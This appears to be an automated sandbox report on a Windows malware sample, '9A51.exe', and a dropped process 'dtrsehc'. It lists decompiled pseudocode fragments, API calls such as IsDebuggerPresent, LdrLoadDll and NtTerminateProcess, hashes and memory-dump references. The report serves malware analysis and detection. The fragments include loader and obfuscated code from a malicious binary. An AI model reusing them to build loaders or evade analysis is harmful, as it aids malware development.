                                                                                                                            Analysis Process: 9A51.exe PID: 6348 Parent PID: 3292 9A51.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Function 00424650, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEncodePointer.NTDLL(00000000,?,0041D00B,?,?,004247C0), ref: 00424657
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.356404699.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.356395523.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000013.00000002.356455295.000000000043E000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000013.00000002.356700570.0000000002B36000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: EncodePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2118026453-0
                                                                                                                            • Opcode ID: 74ebe90980ff84525567f3e1a00b41b8661479b10cc4bfab1013d10dc32df34a
                                                                                                                            • Instruction ID: 55517b2789579e741b97ca7c1e2775b33a46f6c1eefcf645646359622b33a5cc
                                                                                                                            • Opcode Fuzzy Hash: 74ebe90980ff84525567f3e1a00b41b8661479b10cc4bfab1013d10dc32df34a
                                                                                                                            • Instruction Fuzzy Hash: 72A01132088208A3C2002282A80AB02BA0CC3CAB22F000020F20C0A0A20AB2A80280AA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041C850, Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			_entry_() {
				void* _t3;
				void* _t4;

				E00421A20(); // executed
				return L0041C870(_t3, _t4);
			}





                                                                                                                            0x0041c855
                                                                                                                            0x0041c860

                                                                                                                            APIs
                                                                                                                            • ___security_init_cookie.LIBCMTD ref: 0041C855
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.356404699.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.356395523.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000013.00000002.356455295.000000000043E000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000013.00000002.356700570.0000000002B36000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ___security_init_cookie
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3657697845-0
                                                                                                                            • Opcode ID: 989a3b1cde8d75633caca1be5d45cca953f1b250fff02efc506c9fb5d63ec8e4
                                                                                                                            • Instruction ID: b4c5847c6057aa68cb1926534af58b4d3096b8b93e232f8ef140cb075c97b565
                                                                                                                            • Opcode Fuzzy Hash: 989a3b1cde8d75633caca1be5d45cca953f1b250fff02efc506c9fb5d63ec8e4
                                                                                                                            • Instruction Fuzzy Hash: 29A0022569575816015033A7198794A794D48D17597D5001A7519021172D5CE84240AE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00426400, Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 85%
                                                                                                                            			E00426400(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				long _t15;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t29;
				void* _t34;

				_t25 = __esi;
				_t24 = __edi;
				_t22 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_t6 = __eax;
				_t34 = _t20 -  *0x43e494; // 0xaaa404ad
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x43ff40 = _t6;
				 *0x43ff3c = _t20;
				 *0x43ff38 = _t22;
				 *0x43ff34 = _t19;
				 *0x43ff30 = _t25;
				 *0x43ff2c = _t24;
				 *0x43ff58 = ss;
				 *0x43ff4c = cs;
				 *0x43ff28 = ds;
				 *0x43ff24 = es;
				 *0x43ff20 = fs;
				 *0x43ff1c = gs;
				asm("pushfd");
				_pop( *0x43ff50);
				 *0x43ff44 =  *_t29;
				 *0x43ff48 = _v0;
				 *0x43ff54 =  &_a4;
				 *0x43fe90 = 0x10001;
				_t11 =  *0x43ff48; // 0x0
				 *0x43fe44 = _t11;
				 *0x43fe38 = 0xc0000409;
				 *0x43fe3c = 1;
				_t21 =  *0x43e494; // 0xaaa404ad
				_v812 = _t21;
				_t23 =  *0x43e498; // 0x555bfb52
				_v808 = _t23;
				 *0x43fe88 = IsDebuggerPresent();
				_push(1);
				E004263E0(_t12);
				SetUnhandledExceptionFilter(0);
				_t15 = UnhandledExceptionFilter(0x409f14);
				if( *0x43fe88 == 0) {
					_push(1);
					E004263E0(_t15);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                            0x00426400
                                                                                                                            0x00426400
                                                                                                                            0x00426400
                                                                                                                            0x00426400
                                                                                                                            0x00426400
                                                                                                                            0x00426400
                                                                                                                            0x00426400
                                                                                                                            0x00426406
                                                                                                                            0x00426408
                                                                                                                            0x00426408
                                                                                                                            0x0042e96b
                                                                                                                            0x0042e970
                                                                                                                            0x0042e976
                                                                                                                            0x0042e97c
                                                                                                                            0x0042e982
                                                                                                                            0x0042e988
                                                                                                                            0x0042e98e
                                                                                                                            0x0042e995
                                                                                                                            0x0042e99c
                                                                                                                            0x0042e9a3
                                                                                                                            0x0042e9aa
                                                                                                                            0x0042e9b1
                                                                                                                            0x0042e9b8
                                                                                                                            0x0042e9b9
                                                                                                                            0x0042e9c2
                                                                                                                            0x0042e9ca
                                                                                                                            0x0042e9d2
                                                                                                                            0x0042e9dd
                                                                                                                            0x0042e9e7
                                                                                                                            0x0042e9ec
                                                                                                                            0x0042e9f1
                                                                                                                            0x0042e9fb
                                                                                                                            0x0042ea05
                                                                                                                            0x0042ea0b
                                                                                                                            0x0042ea11
                                                                                                                            0x0042ea17
                                                                                                                            0x0042ea23
                                                                                                                            0x0042ea28
                                                                                                                            0x0042ea2a
                                                                                                                            0x0042ea34
                                                                                                                            0x0042ea3f
                                                                                                                            0x0042ea4c
                                                                                                                            0x0042ea4e
                                                                                                                            0x0042ea50
                                                                                                                            0x0042ea55
                                                                                                                            0x0042ea6d

                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0042EA1D
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042EA34
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00409F14), ref: 0042EA3F
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0042EA5D
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 0042EA64
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.356404699.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.356395523.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000013.00000002.356455295.000000000043E000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000013.00000002.356700570.0000000002B36000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: 1ea6f86a7c111197b8bdf7dfa4713be2a9a2f53c2d50d4b1d35e6b3b6dc60ea6
                                                                                                                            • Instruction ID: bd4b84f9345da6beb1a0673a0df17f4644713ed1ad290082bc26f37e4aa523c8
                                                                                                                            • Opcode Fuzzy Hash: 1ea6f86a7c111197b8bdf7dfa4713be2a9a2f53c2d50d4b1d35e6b3b6dc60ea6
                                                                                                                            • Instruction Fuzzy Hash: 02211EB9D002049BC300DF15FA866483BA0BB1E314F50207BED08973B2E7B49989CF5E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Analysis Process: 9A51.exe PID: 6440 Parent PID: 6348 9A51.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Function 004017EA, Relevance: 3.1, APIs: 2, Instructions: 54sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401896
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.368227711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: 093506dd62a563d0441f59a8a05229de1ffc0c7044889409d056a06326e13c21
                                                                                                                            • Instruction ID: e26adff564c5d3d37a4e8030c80122da76794021b5cb737f4d399c49089bd509
                                                                                                                            • Opcode Fuzzy Hash: 093506dd62a563d0441f59a8a05229de1ffc0c7044889409d056a06326e13c21
                                                                                                                            • Instruction Fuzzy Hash: 7001B537604205EADB007EB59D819A93B68AF04365F248777BA12B91F1C938C652A71B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040185B, Relevance: 3.0, APIs: 2, Instructions: 50sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401896
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.368227711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: 1770049ace98a7458e43cc493052677b39fde3cfbd9b887cff6db6baf57fddbe
                                                                                                                            • Instruction ID: a7be6de418827693af2ab350a5dd922dd862006562865765dfea97ffb81bfcac
                                                                                                                            • Opcode Fuzzy Hash: 1770049ace98a7458e43cc493052677b39fde3cfbd9b887cff6db6baf57fddbe
                                                                                                                            • Instruction Fuzzy Hash: BF014F33604204FAEB047A929C45DAA3628AB04355F30C533BA13B90F1D97CCB12A72B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401866, Relevance: 3.0, APIs: 2, Instructions: 45sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401896
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.368227711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: dc1226d4bc2db8ad8be4ba055d694b18d68c57301a1c136da16781e7116eb212
                                                                                                                            • Instruction ID: e54376f1e00a1b05e1b0a4da34ea36749e6d38f0b530b75836749d90234edb27
                                                                                                                            • Opcode Fuzzy Hash: dc1226d4bc2db8ad8be4ba055d694b18d68c57301a1c136da16781e7116eb212
                                                                                                                            • Instruction Fuzzy Hash: DB018637604204EBDB047AD29C41EAA3725AF14315F24C177FE12BA0F1D53D8712A72B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401884, Relevance: 3.0, APIs: 2, Instructions: 40sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401896
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.368227711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: 06c47be1babc5c9914373f87bf5e5a6e30058494f01aa4c1fe81d8ba10f9d84d
                                                                                                                            • Instruction ID: 5cccd4a7217d25da87a080ae0d04b05742d3a6582cdde403d0d4fd1f208729a0
                                                                                                                            • Opcode Fuzzy Hash: 06c47be1babc5c9914373f87bf5e5a6e30058494f01aa4c1fe81d8ba10f9d84d
                                                                                                                            • Instruction Fuzzy Hash: DFF01237644205FBDB047A919C41EAA3729AF44355F20C137BB13790F1C57C8652A72B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040187A, Relevance: 3.0, APIs: 2, Instructions: 39sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401896
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.368227711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: d2cc8ded923418a485b63d44c0e9af69491e3bef1ae54f85540c04aa078cd151
                                                                                                                            • Instruction ID: 5d822ad72a3bc969102d855418471fb3ff8b776078c2435d27f60d427d7e2b1d
                                                                                                                            • Opcode Fuzzy Hash: d2cc8ded923418a485b63d44c0e9af69491e3bef1ae54f85540c04aa078cd151
                                                                                                                            • Instruction Fuzzy Hash: 88F0FF33604205EBDB047AD59C41EAA3729AF04315F20C537BA12790F1CA3D8612AB2B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004026C8, Relevance: 1.5, APIs: 1, Instructions: 47libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004026C8(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct _OBJDIR_INFORMATION _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				long _t12;
				void* _t13;
				void* _t16;
				intOrPtr _t20;
				void* _t22;
				void* _t25;
				UNICODE_STRING* _t26;
				intOrPtr* _t28;

				_t20 =  *_t28;
				L0040118A(0x2700, _t16, _t20, _t22, __eflags);
				_t17 = _a4;
				_t26 =  &_v16;
				 *((intOrPtr*)(_a4 + 0xc))(_t26, _a8, __ecx, 0x51, _t22, _t25, _t16);
				_t23 =  &_v8;
				_t12 = LdrLoadDll(0, 0, _t26,  &_v8);
				_t31 = _t12;
				if(_t12 != 0) {
					_v8 = 0;
				}
				_t13 = 0x2700;
				L0040118A(_t13, _t17, 0x51, _t23, _t31);
				return _v8;
			}
















                                                                                                                            0x004026ee
                                                                                                                            0x004026fb
                                                                                                                            0x00402700
                                                                                                                            0x00402703
                                                                                                                            0x0040270a
                                                                                                                            0x0040270d
                                                                                                                            0x00402716
                                                                                                                            0x00402719
                                                                                                                            0x0040271b
                                                                                                                            0x0040271d
                                                                                                                            0x0040271d
                                                                                                                            0x00402730
                                                                                                                            0x0040274c
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402716
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000001.356150385.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2234796835-0
                                                                                                                            • Opcode ID: fb1d288646eac737f9562cb4a2b5784598c588a48ffd6e473a319c7d6c35b7e7
                                                                                                                            • Instruction ID: 40dc2efb075a3afc972c71eb076c1c0414e6b27fd6f2b5cc45f04f39bc90cd3d
                                                                                                                            • Opcode Fuzzy Hash: fb1d288646eac737f9562cb4a2b5784598c588a48ffd6e473a319c7d6c35b7e7
                                                                                                                            • Instruction Fuzzy Hash: C9016231608504E7DB006A419E4DBAA7764AB44754F208437FA067B1C0D6FD9A4BB76B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004018D3, Relevance: 1.5, APIs: 1, Instructions: 45nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 46%
                                                                                                                            			E004018D3(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {

				 *__eax =  *__eax + __eax;
				__eax = L0040118A(__eax, __ebx, __ecx, __edi, __eflags);
				_pop(__edi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}



                                                                                                                            0x004018db
                                                                                                                            0x004018e5
                                                                                                                            0x004018ea
                                                                                                                            0x004018ec
                                                                                                                            0x004018ed
                                                                                                                            0x004018ed
                                                                                                                            0x004018ee

                                                                                                                            APIs
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.368227711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 560597551-0
                                                                                                                            • Opcode ID: 2828a8cd754e6382065d6a4fb934443d5e18941ecfa79c6ebd95b6c34ee4dc7b
                                                                                                                            • Instruction ID: 169e4967cc86e0c75baf1baab42a0cf60a3c7d0871e4951e2e4ac70a2d426d6d
                                                                                                                            • Opcode Fuzzy Hash: 2828a8cd754e6382065d6a4fb934443d5e18941ecfa79c6ebd95b6c34ee4dc7b
                                                                                                                            • Instruction Fuzzy Hash: 49F0C873604150EBD7013AA19C42AF63769EF01321F248137F923A50F1C63D8612B72B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401888, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.368227711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 560597551-0
                                                                                                                            • Opcode ID: 2a49fbe38ca64fb741f40d4948de9f53ca9b58de087dcfee36be181988c04280
                                                                                                                            • Instruction ID: 934e5413d765c160eebb9f9f9fdb0e9e8b4c73449cfdb306a0b7eda1d20c3935
                                                                                                                            • Opcode Fuzzy Hash: 2a49fbe38ca64fb741f40d4948de9f53ca9b58de087dcfee36be181988c04280
                                                                                                                            • Instruction Fuzzy Hash: 70F03073604104EADB007A959C41AAA3359FB05325F248537BE13B50E1C63D8612B727
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004026D3, Relevance: 1.5, APIs: 1, Instructions: 42libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E004026D3(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				long _t13;
				void* _t14;
				struct _OBJDIR_INFORMATION _t16;
				intOrPtr _t21;
				UNICODE_STRING* _t26;
				void* _t28;
				intOrPtr* _t30;

				asm("sbb eax, [eax]");
				_t21 =  *_t30;
				L0040118A(0x2700, __ebx, _t21, __edi, __eflags);
				_t18 =  *((intOrPtr*)(_t28 + 8));
				_t26 = _t28 - 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)), __ecx, 0x51);
				_t24 = _t28 - 4;
				_t13 = LdrLoadDll(0, 0, _t26, _t28 - 4);
				_t34 = _t13;
				if(_t13 != 0) {
					 *(_t28 - 4) = 0;
				}
				_t14 = 0x2700;
				L0040118A(_t14, _t18, 0x51, _t24, _t34);
				_t16 =  *(_t28 - 4);
				return _t16;
			}










                                                                                                                            0x004026d3
                                                                                                                            0x004026ee
                                                                                                                            0x004026fb
                                                                                                                            0x00402700
                                                                                                                            0x00402703
                                                                                                                            0x0040270a
                                                                                                                            0x0040270d
                                                                                                                            0x00402716
                                                                                                                            0x00402719
                                                                                                                            0x0040271b
                                                                                                                            0x0040271d
                                                                                                                            0x0040271d
                                                                                                                            0x00402730
                                                                                                                            0x0040274c
                                                                                                                            0x00402751
                                                                                                                            0x00402758

                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402716
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000001.356150385.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2234796835-0
                                                                                                                            • Opcode ID: 4e0e5ee68eecc59290c08c9297519d89f54fb23726755cfbd71717b5480a64e1
                                                                                                                            • Instruction ID: 9584a62b05b7d8a9b2a776b7033dab2b10b945a71b24260a1d24854f7785f2a5
                                                                                                                            • Opcode Fuzzy Hash: 4e0e5ee68eecc59290c08c9297519d89f54fb23726755cfbd71717b5480a64e1
                                                                                                                            • Instruction Fuzzy Hash: 9C01D131608500EBCB019E419E4DBAA3760AF04304F208477E606BF1D0C6FD9607FB6B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004026DF, Relevance: 1.5, APIs: 1, Instructions: 38libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004026DF(void* __ebx, signed int __ecx, void* __edi) {
				long _t12;
				void* _t13;
				struct _OBJDIR_INFORMATION _t15;
				signed char _t20;
				intOrPtr _t21;
				UNICODE_STRING* _t26;
				void* _t28;
				intOrPtr* _t30;
				signed char _t33;

				_t20 = __ecx |  *0xebc2f5eb;
				_t33 = _t20;
				_t21 =  *_t30;
				L0040118A(0x2700, __ebx, _t21, __edi, _t33);
				_t17 =  *((intOrPtr*)(_t28 + 8));
				_t26 = _t28 - 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)), _t20, 0x51);
				_t24 = _t28 - 4;
				_t12 = LdrLoadDll(0, 0, _t26, _t28 - 4);
				_t34 = _t12;
				if(_t12 != 0) {
					 *(_t28 - 4) = 0;
				}
				_t13 = 0x2700;
				L0040118A(_t13, _t17, 0x51, _t24, _t34);
				_t15 =  *(_t28 - 4);
				return _t15;
			}












                                                                                                                            0x004026df
                                                                                                                            0x004026df
                                                                                                                            0x004026ee
                                                                                                                            0x004026fb
                                                                                                                            0x00402700
                                                                                                                            0x00402703
                                                                                                                            0x0040270a
                                                                                                                            0x0040270d
                                                                                                                            0x00402716
                                                                                                                            0x00402719
                                                                                                                            0x0040271b
                                                                                                                            0x0040271d
                                                                                                                            0x0040271d
                                                                                                                            0x00402730
                                                                                                                            0x0040274c
                                                                                                                            0x00402751
                                                                                                                            0x00402758

                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402716
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000001.356150385.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2234796835-0
                                                                                                                            • Opcode ID: 66d6ed5a5f97da4cd1e2364b4ff1c60b02b4f842bf72e481ca125f9fdb398aad
                                                                                                                            • Instruction ID: 8c80e095348b3890610be7f7119ddd6f2bf491658c7e2b08e3b2f8ba4f36ee70
                                                                                                                            • Opcode Fuzzy Hash: 66d6ed5a5f97da4cd1e2364b4ff1c60b02b4f842bf72e481ca125f9fdb398aad
                                                                                                                            • Instruction Fuzzy Hash: 61F0C231608505F7CB059B919A5DB9A7B70AF48358F208037E6467F1C0C3BC9A0AEB6B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004026F6, Relevance: 1.5, APIs: 1, Instructions: 33libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004026F6(void* __ebx, void* __ecx, signed int __edx, void* __edi) {
				void* _t12;
				long _t15;
				void* _t16;
				struct _OBJDIR_INFORMATION _t18;
				intOrPtr _t23;
				UNICODE_STRING* _t30;
				signed int _t32;
				intOrPtr* _t34;
				signed char _t37;

				_t37 = __edx |  *(__ebx + _t32 * 8 - 0xe);
				_t23 =  *_t34;
				L0040118A(_t12, __ebx, _t23, __edi, _t37);
				_t20 =  *((intOrPtr*)(_t32 + 8));
				_t30 = _t32 - 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t32 + 8)) + 0xc))(_t30,  *((intOrPtr*)(_t32 + 0xc)), __ecx, 0x51);
				_t28 = _t32 - 4;
				_t15 = LdrLoadDll(0, 0, _t30, _t32 - 4);
				_t38 = _t15;
				if(_t15 != 0) {
					 *(_t32 - 4) = 0;
				}
				_t16 = 0x2700;
				L0040118A(_t16, _t20, 0x51, _t28, _t38);
				_t18 =  *(_t32 - 4);
				return _t18;
			}












                                                                                                                            0x004026f6
                                                                                                                            0x004026ee
                                                                                                                            0x004026fb
                                                                                                                            0x00402700
                                                                                                                            0x00402703
                                                                                                                            0x0040270a
                                                                                                                            0x0040270d
                                                                                                                            0x00402716
                                                                                                                            0x00402719
                                                                                                                            0x0040271b
                                                                                                                            0x0040271d
                                                                                                                            0x0040271d
                                                                                                                            0x00402730
                                                                                                                            0x0040274c
                                                                                                                            0x00402751
                                                                                                                            0x00402758

                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402716
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000001.356150385.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2234796835-0
                                                                                                                            • Opcode ID: 963b1ec641e54d0a3c948b9f5a1a39febab9ff735ad4ee73f913fea554ebc1e3
                                                                                                                            • Instruction ID: d7b1c623c9884319f2b4b1abd5d885049190cb82f350ff51d45b82dffe9b7bfe
                                                                                                                            • Opcode Fuzzy Hash: 963b1ec641e54d0a3c948b9f5a1a39febab9ff735ad4ee73f913fea554ebc1e3
                                                                                                                            • Instruction Fuzzy Hash: E2F05435604505E7CF019A91999DB9E7760EF44354F208067F606BF0D1C2BC960A976A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Analysis Process: dtrsehc PID: 6452 Parent PID: 6312 dtrsehcCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Function 00402AC0, Relevance: .1, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 42%
                                                                                                                            			E00402AC0(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __fp0) {
				intOrPtr* _t21;
				void* _t24;
				void* _t27;

				_t24 = __ecx;
				_push(0xffffffb6);
				 *((intOrPtr*)(__ebx + 0x47)) =  *((intOrPtr*)(__ebx + 0x47)) - __ebx;
				_push(__ecx);
				_t23 = 0x2e9e9c3;
				asm("in al, dx");
				asm("cmpsd");
				asm("loopne 0x4");
				asm("sbb al, 0x27");
				_t3 = __ecx - 0x16161681;
				 *_t3 =  *((intOrPtr*)(__ecx - 0x16161681)) - __eax + __eax - _t27;
				_t21 = 2;
				asm("in al, dx");
				if( *_t3 >= 0) {
					_t23 = 0x2e9e9c3 +  *0xf4b01aa;
					_push(ss);
					_push(ss);
					_t21 = 0x2b10;
					_push(0xad);
				}
				asm("lodsd");
				 *_t21 =  *_t21 + _t21;
				 *((intOrPtr*)(_t24 - 0x15)) =  *((intOrPtr*)(_t24 - 0x15)) + _t23;
				_t21 = _t21 + 0xf4eb0301;
				__eax = L0040118A(__eax, __ebx, __ecx, __edi, __eflags);
			}






                                                                                                                            0x00402ac0
                                                                                                                            0x00402ac0
                                                                                                                            0x00402ac2
                                                                                                                            0x00402ac5
                                                                                                                            0x00402ac6
                                                                                                                            0x00402acb
                                                                                                                            0x00402acc
                                                                                                                            0x00402acd
                                                                                                                            0x00402acf
                                                                                                                            0x00402ad5
                                                                                                                            0x00402ad5
                                                                                                                            0x00402adb
                                                                                                                            0x00402add
                                                                                                                            0x00402ade
                                                                                                                            0x00402ae0
                                                                                                                            0x00402ae6
                                                                                                                            0x00402ae7
                                                                                                                            0x00402aed
                                                                                                                            0x00402afe
